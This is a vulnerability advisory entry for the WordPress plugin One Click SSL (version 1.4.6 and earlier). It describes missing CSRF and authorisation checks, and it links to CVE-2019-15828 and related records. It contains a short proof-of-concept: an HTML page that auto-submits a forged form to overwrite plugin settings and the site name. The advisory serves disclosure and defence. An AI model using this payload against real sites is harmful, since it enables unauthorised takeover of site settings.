Lucene search
WpvulndbWPEX-ID:F03156D3-0B6A-4FA6-A2B0-7218F3BA40A4HistoryJul 11, 2019 - 12:00 a.m.
One Click SSL <= 1.4.6 - Multiple Issues
2019-07-1100:00:00
wpvulndb
12
0.002 Low
EPSS
Percentile
51.5%
Lack of CSRF and authorisation checks in the settings page, as well as AJAX methods such as ajax_enable_ssl(), ajax_scan() and so on could allow unauthorised settings change as well as call of the AJAX methods by a low privileged user. Additionally, it could also allow arbitrary site options update due to the way the update_option() and update_site_option() are used in the admin() and admin_network() functions.
<html>
<body onload="document.forms[0].submit()">
<form action="https://<BLOG>/wp-admin/admin.php?page=one-click-ssl" method="POST">
<!-- Plugin's Settings -->
<input type="hidden" name="ocssl_toolsmenu" value="1"/>
<input type="hidden" name="ocssl_nonsslredirect" value="1"/>
<!-- WP Options -->
<input type="hidden" name="blogname value="Owned"/>
</form>
</body>
</html>Related
wpvulndb
wpvulndb
One Click SSL <= 1.4.6 - Multiple Issues
2019-07-11 00:00:00
cve
cve
CVE-2019-15828
2019-08-30 14:15:10
openvas
openvas
WordPress One Click SSL Plugin < 1.4.7 CSRF Vulnerability
2019-09-05 00:00:00
cvelist
cvelist
CVE-2019-15828
2019-08-30 13:10:10
nvd
nvd
CVE-2019-15828
2019-08-30 14:15:10
prion
prion
Cross site request forgery (csrf)
2019-08-30 14:15:00